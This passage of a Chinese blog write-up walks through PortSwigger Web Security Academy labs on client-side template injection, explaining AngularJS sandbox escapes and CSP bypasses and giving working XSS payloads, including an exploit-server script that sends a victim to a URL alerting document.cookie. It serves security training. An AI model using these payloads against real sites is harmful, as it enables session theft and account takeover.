   <p><a href="http://img.e-com-net.com/image/info8/16060df63e7d48e48f7aba786fc93170.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第88张图片" height="481" src="http://img.e-com-net.com/image/info8/16060df63e7d48e48f7aba786fc93170.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p>直接弹窗了</p> 
   <p><a href="http://img.e-com-net.com/image/info8/1acb8421d6c54f75915da94e4bc81d83.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第89张图片" height="413" src="http://img.e-com-net.com/image/info8/1acb8421d6c54f75915da94e4bc81d83.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p><a href="http://img.e-com-net.com/image/info8/45f0f2cbcbcf4099b966b5aedd2f57bd.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第90张图片" height="319" src="http://img.e-com-net.com/image/info8/45f0f2cbcbcf4099b966b5aedd2f57bd.jpg" width="650" style="border:1px solid black;"></a></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <hr> 
  <hr> 
  <h1 id="%E5%9B%9B%E3%80%81%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5"><span style="background-color:#38d8f0;">四、客户端模板注入</span></h1> 
  <h2><span style="background-color:#a2e043;">1、简述：</span></h2> 
  <p>当使用客户端模板框架的应用程序在网页中动态嵌入用户输入时，会出现客户端模板注入漏洞。呈现页面时，框架扫描页面以查找模板表达式，并执行遇到的任何模板表达式。攻击者可以通过提供恶意模板表达式来攻击此漏洞，从而启动跨站点脚本（XSS）攻击。 </p> 
  <p></p> 
  <p><br>  </p> 
  <blockquote> 
   <h2 id="%C2%A02%E3%80%81AngularJS%E6%B2%99%E7%9B%92"><span style="background-color:#a2e043;"> 2、AngularJS沙盒</span></h2> 
   <p>1、是一种机制：可防止访问AngularJS模板表达式中具有潜在危险的对象，如window或document（窗口或文档）。它还阻止访问具有潜在危险的属性，如__proto__。虽然绕过沙箱最初很有挑战性，但安全研究人员已经发现了许多方法。因此最终在1.6版的AngularJS中被删除。但许多遗留应用程序仍然使用旧版本的AngularJS，因此可能容易受到攻击。 </p> 
   <hr> 
   <p>2、沙箱的工作原理：即解析表达式，重写JavaScript，然后使用各种函数测试重写的代码是否包含任何危险对象。例如， ensureSafeObject()函数检查给定对象是否引用自身。这是一种检测window对象，</p> 
   <pre><code>例如。该Function（功能）构造函数的检测方法大致相同，即检查构造函数属性是否引用自身。

ensureSafeMemberName （） 函数检查对象的每个属性访问，如果它包含危险属性（如__proto__或__lookupGetter__），则将阻止对象。ensureSafeFunction （） 函数防止 调用call（） 、apply（）、bind（）或constructor（）。</code></pre> 
   <hr> 
   <p>3、AngularJS沙盒逃逸</p> 
   <p> 沙箱逃逸涉及欺骗沙箱，使其认为恶意表达式是良性的。</p> 
   <pre><code>最著名的转义在表达式中全局使用修改后的charAt()函数：
'a'.constructor.prototype.charAt=[].join</code></pre> 
   <pre><code>当它最初被发现时，AngularJS并没有阻止这种修改。攻击者使用 [].join方法覆盖函数，导致charAt()函数返回发送给它的所有字符，而不是特定的单个字符。由于AngularJS中isIdent()函数的逻辑，它会将它认为是单个字符的内容与多个字符的内容进行比较。由于单个字符始终少于多个字符，因此isIdent()函数始终返回true

如下例所示：
isIdent = function(ch) {
    return ('a' <= ch && ch <= 'z' || 'A' <= ch && ch <= 'Z' || '_' === ch || ch === '$');
}
isIdent('x9=9a9l9e9r9t9(919)')

一旦 isIdent()函数被骗，就可以注入恶意JavaScript。例如，可以使用$eval('x =alert(1)')这样的表达式，因为AngularJS将每个字符都视为标识符。注意，我们需要使用AngularJS的$eval()函数，因为覆盖charAt()函数只有在沙箱代码执行后才会生效。这种技术将绕过沙箱并允许任意JavaScript执行</code></pre> 
   <hr> 
   <p>4、构造高级AngularJS沙盒转义</p> 
   <p>可能会遇到对允许使用哪些字符有更多限制的站点。如某个站点可能禁止使用双引号或单引号。在这种情况下，需要使用String.fromCharCode()之类的函数来生成字符。尽管AngularJS阻止访问表达式中的String构造函数，但可以通过使用字符串的constructor属性来解决这个问题。这显然需要一个字符串，因此要构造这样的攻击，需要找到一种不使用单引号或双引号创建字符串的方法。</p> 
   <pre><code>在标准沙箱转义中，将使用 $eval()来执行JavaScript负载，但在下面的实验中，$eval()函数未定义。可以使用orderBy过滤器代替。
典型语法orderBy过滤器如下：
[123]|orderBy:'Some string'</code></pre> 
   <p>| 运算符的含义与JavaScript中的含义不同。这是一个按位OR操作，但在AngularJS中，它表示一个过滤操作。 OR操作，但在AngularJS中，它表示过滤器操作.在上面的代码中，将左边的数组[123]发送到右边的orderBy过滤器。 [123] 在左边到 orderBy 在右边过滤器。冒号表示要发送给筛选器的参数，在本例中为字符串。orderBy过滤器通常用于对对象进行排序，但它也接受表达式，这意味着可以使用它来传递有效负载。</p> 
   <p>————</p> 
   <p>涉及实验：<br> 实验27：反射的XSS，带AngularJS沙箱转义，不带字符串</p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%E5%AE%9E%E9%AA%8C27%EF%BC%9A%E5%8F%8D%E5%B0%84%E7%9A%84XSS%EF%BC%8C%E5%B8%A6AngularJS%E6%B2%99%E7%AE%B1%E8%BD%AC%E4%B9%89%EF%BC%8C%E4%B8%8D%E5%B8%A6%E5%AD%97%E7%AC%A6%E4%B8%B2"><span style="background-color:#a2e043;">实验27：反射的XSS，带AngularJS沙箱转义，不带字符串</span></h2> 
   <p>信息：</p> 
   <p>本实验以一种不寻常的方式使用AngularJS，其中$eval函数不可用，将无法在AngularJS中使用任何字符串。</p> 
   <p>解决实验：执行一个跨站点脚本攻击，该攻击可以跳出沙箱并在不使用$eval函数的情况下执行alert函数</p> 
   <hr> 
   <p>part1：</p> 
   <p>payload：</p> 
   <p>访问以下URL（将YOUR-LAB-ID替换为您的实验室ID）</p> 
   <pre><code>https://YOUR-LAB-ID.web-security-academy.net/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

我的是：
https://0a51002503946316c0db0cb800f300d2.web-security-academy.net/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1</code></pre> 
   <hr> 
   <p>原理：</p> 
   <p>1、该漏洞利用使用toString()创建不使用引号的字符串。然后获取String原型并为每个字符串重写charAt函数。这有效地打破了AngularJS沙箱。</p> 
   <p>2、将数组传递给orderBy筛选器。</p> 
   <p>3、再次使用toString()创建一个字符串和String构造函数属性来设置过滤器的参数。</p> 
   <p>4、使用fromCharCode方法将字符代码转换为字符串x=alert(1)，从而生成有效负载。因为charAt函数已被覆盖，AngularJS将允许此代码，而通常不会允许此代码</p> 
   <p><a href="http://img.e-com-net.com/image/info8/cbebd1aef70d452cbdcb6300285c9c10.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第91张图片" height="354" src="http://img.e-com-net.com/image/info8/cbebd1aef70d452cbdcb6300285c9c10.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%C2%A03%E3%80%81AngularJS%20CSP%E6%97%81%E8%B7%AF"><span style="background-color:#a2e043;"> 3、AngularJS CSP旁路</span></h2> 
   <p>1、内容安全策略（CSP）绕过的工作方式与标准沙箱转义类似，但通常涉及一些HTML注入。当CSP模式在AngularJS中处于活动状态时，它以不同的方式解析模板表达式，并避免使用Function构造函数。这意味着上面描述的标准沙箱转义将不再起作用。</p> 
   <hr> 
   <p>2、根据特定的策略，CSP将阻止JavaScript事件。但是，AngularJS定义了自己的事件，可以替代使用。在事件内部时，AngularJS定义一个特殊的 <code>$event</code>对象，该对象仅引用浏览器事件对象。可以使用此对象执行CSP绕过。在Chrome上，有一个特殊的属性 <code>$event/event</code> 对象调用<code>path</code>。此属性包含导致事件执行的对象数组。最后一个属性始终是<code>window</code>对象，我们可以使用它来执行沙箱转义。通过将此数组传递给<code>orderBy</code>过滤器，我们可以枚举数组并使用最后一个元素（<code>window</code>对象）来执行全局函数，例如<code>alert()</code>。</p> 
   <pre><code>下面的代码演示了这一点：
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'"></code></pre> 
   <p><br> 这里使用了from()函数，它允许您将对象转换为数组，并对该数组的每个元素调用给定函数（在第二个参数中指定）。在本例中，调用alert()函数。不能直接调用函数，因为AngularJS沙盒会解析代码并检测到<code>window</code>对象正被用于调用函数。相反，使用 from()函数可以有效地隐藏沙箱中的<code>window</code>对象，从而允许注入恶意代码</p> 
   <hr> 
   <p>3、使用AngularJS沙箱转义绕过CSP</p> 
   <p>当使用了长度限制，因此上面的向量将不起作用。需要考虑各种隐藏<code>window</code>AngularJS沙盒中的对象。</p> 
   <pre><code>执行此操作的一种方法是使用 array.map()功能如下：
[1].map(alert)</code></pre> 
   <p>map()接受一个函数作为参数，并为数组中的每一项调用该函数。这将绕过沙箱，因为对alert()函数的引用没有显式引用窗口。尝试各种方法来执行alert()，而不触发AngularJS的窗口检测<br>  </p> 
   <hr> 
   <p>4、涉及实验：</p> 
   <p>实验28：反射XSS与AngularJS沙箱转义和CSP</p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p></p> 
  <blockquote> 
   <h2 id="%C2%A0%E5%AE%9E%E9%AA%8C28%EF%BC%9A%E5%8F%8D%E5%B0%84XSS%E4%B8%8EAngularJS%E6%B2%99%E7%AE%B1%E8%BD%AC%E4%B9%89%E5%92%8CCSP"><span style="background-color:#a2e043;"> 实验28：反射XSS与AngularJS沙箱转义和CSP</span></h2> 
   <p>信息：</p> 
   <p>本实验使用CSP和AngularJS。</p> 
   <p>解决实验：执行跨站点脚本攻击，绕过CSP，逃离AngularJS沙箱，并向document.cookie发出alert</p> 
   <hr> 
   <p>part1:</p> 
   <p>转到漏洞利用服务器并粘贴以下代码(将YOUR-LAB-ID替换为实验室ID)</p> 
   <pre><code><script>
location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script>

我的是：
<script>
location='https://0adf00330363346cc1da6de700680019.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script></code></pre> 
   <p>原理：</p> 
   <p>该漏洞利用使用AngularJS中的ng-focus事件创建绕过CSP的焦点事件。它还使用$event，这是一个引用事件对象的AngularJS变量。path属性特定于Chrome，包含触发事件的元素数组。数组中的最后一个元素包含窗口对象。</p> 
   <p>一般来说，|在JavaScript中是按位或操作，但在AngularJS中它表示过滤器操作，在本例中是orderBy过滤器。冒号表示要发送到筛选器的参数。在参数中，我们没有直接调用alert函数，而是将其赋给变量z。只有当orderBy操作到达$event. path数组中的window对象时，才会调用该函数。这意味着它可以在窗口范围内调用，而无需显式引用窗口对象，从而有效地绕过AngularJS的窗口检查。</p> 
   <hr> 
   <p>part2:</p> 
   <p>到服务器</p> 
   <p>单击"存储"和"向受害者发送利用漏洞攻击"</p> 
   <p><a href="http://img.e-com-net.com/image/info8/161dc540894f4d2dafb9f6b5c11efe73.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第92张图片" height="402" src="http://img.e-com-net.com/image/info8/161dc540894f4d2dafb9f6b5c11efe73.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p> <a href="http://img.e-com-net.com/image/info8/0a475e242bfb4ade92394467780a3763.jpg" target="_blank"><img alt="【burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验（上）_第93张图片" height="267" src="http://img.e-com-net.com/image/info8/0a475e242bfb4ade92394467780a3763.jpg" width="650" style="border:1px solid black;"></a></p> 
   <p></p> 
  </blockquote> 
  <p></p> 
  <p><br>  </p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1668794780169101312"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(#,【万文】bp靶场,安全,web安全,网络)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1830750364303978496.htm"
                           title="微软AD替代方案统一管理Windows和信创电脑的登录认证与网络准入认证" target="_blank">微软AD替代方案统一管理Windows和信创电脑的登录认证与网络准入认证</a>
                        <span class="text-muted">宁盾Nington</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>自国资委79号文明确了2027年底前信息系统全面国产化的目标后，金融单位、央国企集团及各子公司纷纷加大国产化改造力度。不少子、孙公司表示，集团要求到2024年底或2025年底国外的关键IT基础设施要停止使用，如微软AD、云桌面等。信创国产化是大势所趋，不可能走回头路。那么在采购了国产化的操作系统电脑、服务器、云桌面、邮箱后，如何再用微软AD国产化替换方案进行统一管理，以确保员工的使用习惯不改变，业</div>
                    </li>
                    <li><a href="/article/1830749878037344256.htm"
                           title="快递贴上“六个一律”，反诈知识“送货上门”" target="_blank">快递贴上“六个一律”，反诈知识“送货上门”</a>
                        <span class="text-muted">風雲</span>

                        <div>“陌生号码让你转钱的电话，一律挂掉；陌生号码让你汇款的信息，一律删掉……”“如不慎被诈骗，请及时拨打110报警或拨打0516-89155110（反诈中心）”。为有效提高反诈宣传受众人群的精准性和覆盖面，提升辖区居民的防骗、识骗能力，5月13日，丰县中阳里街道和丰园社区平安志愿者服务站组织平安志愿者到“菜鸟、“快宝”驿站，将反诈骗宣传卡片贴在快递包裹上，反诈骗提示“送货上门”。网络诈骗离日常生活很近</div>
                    </li>
                    <li><a href="/article/1830749482392842240.htm"
                           title="四种NAT类型" target="_blank">四种NAT类型</a>
                        <span class="text-muted">瘦弱的皮卡丘</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a><a class="tag" taget="_blank" href="/search/NAT/1.htm">NAT</a><a class="tag" taget="_blank" href="/search/ICE/1.htm">ICE</a><a class="tag" taget="_blank" href="/search/stun/1.htm">stun</a><a class="tag" taget="_blank" href="/search/turn/1.htm">turn</a>
                        <div>1.全锥型NAT（FullConeNAT）全锥型NAT（FullConeNAT），又称为一对一NAT，是四种主要NAT类型之一，用于实现私有网络与公共网络之间的IP地址转换和端口转换。在全锥型NAT中，一个内部IP地址和端口的组合被映射到一个公共IP地址和端口的组合。一旦映射建立，任何外部设备都可以使用这个公共IP地址和端口与内部设备通信，而不管外部设备的IP地址和端口是什么。这种映射是持久的，直</div>
                    </li>
                    <li><a href="/article/1830748356020891648.htm"
                           title="阿里云大数据专业认证考试" target="_blank">阿里云大数据专业认证考试</a>
                        <span class="text-muted">xmvip01</span>

                        <div>阿里云大数据专业认证（AlibabaCloudCertifiedProfessional,ACP）是面向使用阿里云大数据产品的架构、开发、运维类人员的专业技术认证“大数据”是指以多元形式，自许多来源搜集而来的庞大数据组，往往具有实时性。在企业对企业销售的情况下，这些数据可能得自社交网络、电子商务网站、顾客来访纪录，还有许多其他来源。这些数据，并非公司顾客关系管理数据库的常态数据组。从技术上看，大数</div>
                    </li>
                    <li><a href="/article/1830745829640597504.htm"
                           title="Flask wtforms组件的作用" target="_blank">Flask wtforms组件的作用</a>
                        <span class="text-muted">ac-er8888</span>
<a class="tag" taget="_blank" href="/search/flask/1.htm">flask</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                        <div>Flaskwtforms组件（WTForms）在Flask框架中扮演着至关重要的角色，其作用主要体现在表单验证和模板渲染两个方面。以下是对Flaskwtforms组件作用的详细阐述：一、表单验证WTForms的主要功能之一是表单验证，即将用户提交的数据进行验证，以确保其符合应用或系统的要求。这一功能对于保护应用安全、提高用户体验具有重要意义。1.验证流程WTForms的验证流程通常包括以下几个步骤</div>
                    </li>
                    <li><a href="/article/1830743558622113792.htm"
                           title="基于运行上下文的APP软件架构设计" target="_blank">基于运行上下文的APP软件架构设计</a>
                        <span class="text-muted">江中散人</span>
<a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E6%97%A5%E5%BF%97/1.htm">编程日志</a><a class="tag" taget="_blank" href="/search/IOS%E5%BC%80%E5%8F%91%E4%B8%93%E6%A0%8F/1.htm">IOS开发专栏</a><a class="tag" taget="_blank" href="/search/%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">多线程</a><a class="tag" taget="_blank" href="/search/IOS/1.htm">IOS</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84%E8%AE%BE%E8%AE%A1/1.htm">架构设计</a><a class="tag" taget="_blank" href="/search/IM/1.htm">IM</a><a class="tag" taget="_blank" href="/search/CoreData/1.htm">CoreData</a>
                        <div>1论状态1.1论Web开发的无状态性客户端开发与Web端开发最大的不同就在于是否能保留系统运行状态，Web系统走的是HTTP请求，HTTP请求本身就是无状态的，因此即使是同一用户的相临两次请求，对于Web站点而言也是两个完全独立、毫不相干的操作请求。也因为这个原因，Web系统天然承载不了上下文操作关联性很强的需求（很明显的例子就是各类大型游戏，即便是网络游戏）。这种无状态性，对于web系统的开发与</div>
                    </li>
                    <li><a href="/article/1830737808516542464.htm"
                           title="2021-06-08" target="_blank">2021-06-08</a>
                        <span class="text-muted">如鱼饮水2020</span>

                        <div>中原焦点团队网络初23复训28中26坚持分享第349天，约练第189场，本周2（20210608）约练感悟，每个人的世界都是自己建构起来的，那些过往的经验，悲欢离合的感受建构起眼前的主观世界，深刻体会到过去是造就了现在。身在此山中，云中不知处，只有在咨询师的陪伴下，旁观者清，才能抽丝剥茧看到盲点。晒晒太阳，发霉的盲点消消毒，只为更好更健康的成长。复训群里每天一个问题，今天的问题是孩子不愿意去咨询，</div>
                    </li>
                    <li><a href="/article/1830735271231057920.htm"
                           title="2022-09-25" target="_blank">2022-09-25</a>
                        <span class="text-muted">段姑娘</span>

                        <div>《中原焦点团队》网络初期班37期段丽萌坚持原创分享第11天2022年9月25日刷抖音刷到一句话，说“心就拳头那么大，别让它装太多事，它受不了”是啊！就那么大点，让它承受的太多了，现在就该吃吃该喝喝，啥事不往心里搁。自己快乐就行！管他孩子上学不上学，管他老公理解不理解，活自己。</div>
                    </li>
                    <li><a href="/article/1830735243687063552.htm"
                           title="深度学习(二)" target="_blank">深度学习(二)</a>
                        <span class="text-muted">小泽爱刷题</span>
<a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>CuDNN（CUDADeepNeuralNetworklibrary）是NVIDIA为加速深度学习计算而开发的高性能GPU加速库，专门优化了深度神经网络（DNN）的常见操作，如卷积、池化、归一化和激活函数等。CuDNN的主要作用是通过利用GPU的并行计算能力，提高深度学习模型在GPU上的运行效率。CuDNN的作用加速卷积操作：卷积操作是深度学习中特别是在卷积神经网络（CNN）中最重要且最计算密集的</div>
                    </li>
                    <li><a href="/article/1830731842597253120.htm"
                           title="防火墙三种模式（路由/透明/混合模式）工作过程 P2" target="_blank">防火墙三种模式（路由/透明/混合模式）工作过程 P2</a>
                        <span class="text-muted">S0linteeH</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>路由模式工作过程防火墙工作在路由模式下，此时所有接口都配置IP地址，各接口所在的安全区域是三层区域，不同三层区域相关的接口连接的外部用户属于不同的子网。当报文在三层区域的接口间进行转发时，根据报文的IP地址来查找路由表，此时防火墙表现为一个路由器。但是，防火墙与路由器存在不同，防火墙中IP报文还需要送到上层进行相关过滤等处理，通过检查会话表或ACL规则以确定是否允许该报文通过。此外，还要完成其它防</div>
                    </li>
                    <li><a href="/article/1830730800233017344.htm"
                           title="女人怎样在婚姻生活中拥有主动权？" target="_blank">女人怎样在婚姻生活中拥有主动权？</a>
                        <span class="text-muted">童说人生</span>

                        <div>来源于网络人有三样东西是不该挥霍的，身体、金钱和爱；你想挥霍却得不偿失。——纳博科夫《洛丽塔》1、北方都下起了大雪，而南方的天气还如初夏，清凉而冒着热气。带娃到社区里去溜达，遇到了妈妈在这里要好的一位阿姨，便打招呼，聊起了家常。这一唠嗑，阿姨便滔滔不绝了，控诉起自家媳妇来了。媳妇工作不错，生娃休完产假，便请阿姨从小城镇到广州来带孩子。但是两人在饮食、教育等上有诸多不同，因此矛盾多多。但最让阿姨不满</div>
                    </li>
                    <li><a href="/article/1830729953918939136.htm"
                           title="CRUD的最佳实践，联动前后端，包含微信小程序，API，HTML等(二)" target="_blank">CRUD的最佳实践，联动前后端，包含微信小程序，API，HTML等(二)</a>
                        <span class="text-muted">PasteSpider</span>
<a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a><a class="tag" taget="_blank" href="/search/Core/1.htm">Core</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/.netcore/1.htm">.netcore</a>
                        <div>CRUD老生常谈，但是我搜索了一圈，发觉几乎是着重在后端，也就是API部分！无外乎2个思路1.归总的接口，比如一个接口，实现不同表的CRUD2.基于各自的表，使用代码生成器实现CRUD个人来说是推荐2，虽然代码多了，其实结构更加清晰，而且！而且！后端对安全尤为重要！！！啥？你说前端就不安全了？？？前端！那不叫安全，那叫用户体验，体验懂否？后端！那才是安全关口！重要的门户！！！！如果使用1的方式，你</div>
                    </li>
                    <li><a href="/article/1830728568108314624.htm"
                           title="深度学习(一)" target="_blank">深度学习(一)</a>
                        <span class="text-muted">小泽爱刷题</span>
<a class="tag" taget="_blank" href="/search/%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0/1.htm">深度学习</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>稀疏激活是ReLU函数的一个重要特性，它使得在前向传播和反向传播过程中，网络的计算变得更加高效。大多数神经元的激活值为0可以减少计算和存储开销，从而提高训练效率。sigmoid适用于常用于二分类任务的输出层，因为它能将输出值压缩到[0,1]之间，表示概率值。非零均值:输出值总是非零，这可能会导致训练过程中较慢的收敛。梯度消失问题:当输入值很大或很小时，梯度接近于0，导致训练过程中梯度更新变得缓慢。</div>
                    </li>
                    <li><a href="/article/1830728265107599360.htm"
                           title="人工智能&机器学习&深度学习" target="_blank">人工智能&机器学习&深度学习</a>
                        <span class="text-muted">AA杂货铺111</span>

                        <div>机器学习：一切通过优化方法挖掘数据中规律的学科。深度学习：一切运用了神经网络作为参数结构进行优化的机器学习算法。强化学习：不仅能利用现有数据，还可以通过对环境的探索获得新数据，并利用新数据循环往复地更新迭代现有模型的机器学习算法。学习是为了更好地对环境进行探索，而探索是为了获取数据进行更好的学习。深度强化学习：一切运用了神经网络作为参数结构进行优化的强化学习算法。人工智能定义与分类人工智能（Art</div>
                    </li>
                    <li><a href="/article/1830727434165645312.htm"
                           title="Golang深入浅出之-Go语言模板（text/template）：动态生成HTML" target="_blank">Golang深入浅出之-Go语言模板（text/template）：动态生成HTML</a>
                        <span class="text-muted">Jimaks</span>
<a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a><a class="tag" taget="_blank" href="/search/golang/1.htm">golang</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>在现代Web开发中，动态生成HTML页面是一项基本需求，而Go语言通过其标准库text/template和html/template提供了强大的模板处理功能。本文将深入浅出地介绍Go语言模板的基础、常见问题、易错点及避免策略，并辅以代码示例，帮助开发者高效、安全地生成动态HTML。一、Go模板基础Go的模板引擎允许你定义一个模板结构，然后将数据填充到这个结构中生成最终的输出文本。其中，text/t</div>
                    </li>
                    <li><a href="/article/1830726423149637632.htm"
                           title="Web安全之XSS跨站脚本攻击" target="_blank">Web安全之XSS跨站脚本攻击</a>
                        <span class="text-muted">Shadow_143</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a>
                        <div>1.XSS漏洞简介XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。2.XSS</div>
                    </li>
                    <li><a href="/article/1830725288355524608.htm"
                           title="【并发编程】Mutex（互斥锁）拓展提高" target="_blank">【并发编程】Mutex（互斥锁）拓展提高</a>
                        <span class="text-muted">了 凡</span>
<a class="tag" taget="_blank" href="/search/Golang/1.htm">Golang</a><a class="tag" taget="_blank" href="/search/%E5%B9%B6%E5%8F%91%E7%BC%96%E7%A8%8B/1.htm">并发编程</a><a class="tag" taget="_blank" href="/search/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/1.htm">操作系统</a><a class="tag" taget="_blank" href="/search/%E5%B9%B6%E5%8F%91%E7%BC%96%E7%A8%8B/1.htm">并发编程</a><a class="tag" taget="_blank" href="/search/Mutex%E4%BA%92%E6%96%A5%E9%94%81/1.htm">Mutex互斥锁</a><a class="tag" taget="_blank" href="/search/go%E8%AF%AD%E8%A8%80/1.htm">go语言</a>
                        <div>博主介绍：–我是了凡，喜欢每日在简书上投稿日更的读书感悟笔名：了_凡。专注于GoWeb后端，了解过一些Python、Java、算法、前端等领域。微信公众号【了凡银河系】期待你的关注。未来大家一起加油啊~前言文章目录前言为什么要基于Mutex进行扩展？TryLock方法实现基于Mutex实现TryLock方法获取等待者的数量等指标使用Mutex实现一个线程安全的队列为什么要基于Mutex进行扩展？在</div>
                    </li>
                    <li><a href="/article/1830719489621192704.htm"
                           title="2024年入职/转行网络安全，该如何规划？_网络安全职业规划" target="_blank">2024年入职/转行网络安全，该如何规划？_网络安全职业规划</a>
                        <span class="text-muted">徐老师教网络安全</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/https/1.htm">https</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a>
                        <div>前言前段时间，知名机构麦可思研究院发布了《2022年中国本科生就业报告》，其中详细列出近五年的本科绿牌专业，其中，信息安全位列第一。网络安全前景对于网络安全的发展与就业前景，想必无需我多言，作为当下应届生收入较高的专业之一，网络安全同样也在转行领域中占据热门位置，主要具备以下几点转行优势：行业人才缺口大，至2027年我国网安人才缺口将达327万知识体系友好，计算机及英语水平相对薄弱的同学也可学习上</div>
                    </li>
                    <li><a href="/article/1830719362189848576.htm"
                           title="2024年入职/转行网络安全，该如何规划？_网络安全职业规划" target="_blank">2024年入职/转行网络安全，该如何规划？_网络安全职业规划</a>
                        <span class="text-muted">徐老师教网络安全</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/https/1.htm">https</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a>
